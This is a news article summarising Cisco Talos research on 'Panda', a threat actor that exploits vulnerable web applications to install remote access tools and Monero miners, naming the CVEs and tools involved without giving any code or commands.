‘Panda’ Group Makes Thousands of Dollars Using RATs, Crypto-Miners

A new threat actor has generated thousands of dollars in the Monero cryptocurrency using remote access tools (RATs) and illicit cryptocurrency mining malware, Cisco’s Talos threat intelligence and research group revealed on Tuesday.

Although not highly sophisticated, the actor, which Talos refers to as Panda, is highly active, focused on persistently exploiting vulnerable web applications worldwide. The actor’s tools allow it to traverse networks, while the use of RATs also puts organizations at risk of data theft.

The group is capable of updating its infrastructure and exploits on the fly and relies on exploits released by Shadow Brokers for infiltration, as well as the open-source credential-dumping application Mimikatz.

Initially associated with last year’s MassMiner campaign, the threat actor was shortly after linked to another widespread mining campaign that used a different set of command and control (C&C) servers. Panda has since updated not only the infrastructure, but also its portfolio of exploits and payloads.

The cybercriminals, Talos’ security researchers say, have been observed targeting organizations in multiple industries, including those in the banking, healthcare, transportation, telecommunications, and IT services sectors.

In July 2018, the actor was exploiting a WebLogic vulnerability (CVE-2017-10271) to drop a miner associated with MassMiner. The hackers were mass-scanning for vulnerable servers and also attempted to exploit an Apache Struts 2 vulnerability (CVE-2017-5638). A PowerShell exploit was used to download a miner payload.

“In all, we estimate that Panda has amassed an amount of Monero that is currently valued at roughly $100,000,” Talos says.

Panda was also observed using Gh0st RAT and dropping other hacking tools and exploits, including Mimikatz and exploits that the Shadow Brokers are said to have stolen from the National Security Agency (NSA).

Talos researchers spotted elements of the MassMiner attacks being used in a campaign that employed a different C&C server, suggesting that the same actor might have been behind both.

In January 2019, the threat actor was exploiting a flaw in the ThinkPHP web framework (CNVD-2018-24942) to spread similar malware. In March 2019, it was using new infrastructure, although the tactics, techniques, and procedures (TTPs) remained similar.

Soon after, Panda started employing an updated payload, which used the Certutil tool in Windows to download the secondary miner payload. Exploit modules designed for lateral movement were still used, many related to the NSA exploits.

Over the past month, Panda has updated its C&C and payload-hosting infrastructure, but the employed malware remains relatively similar to what was used in May 2019. In August, the hackers added another set of domains to their inventory, the researchers say.

“Panda’s operational security remains poor, with many of their old and current domains all hosted on the same IP and their TTPs remaining relatively similar throughout campaigns. The payloads themselves are also not very sophisticated,” Talos concludes.

Related: MassMiner Attacks Web Servers With Multiple Exploits

Related: Stealthy Crypto-Miner Has Worm-Like Spreading Mechanism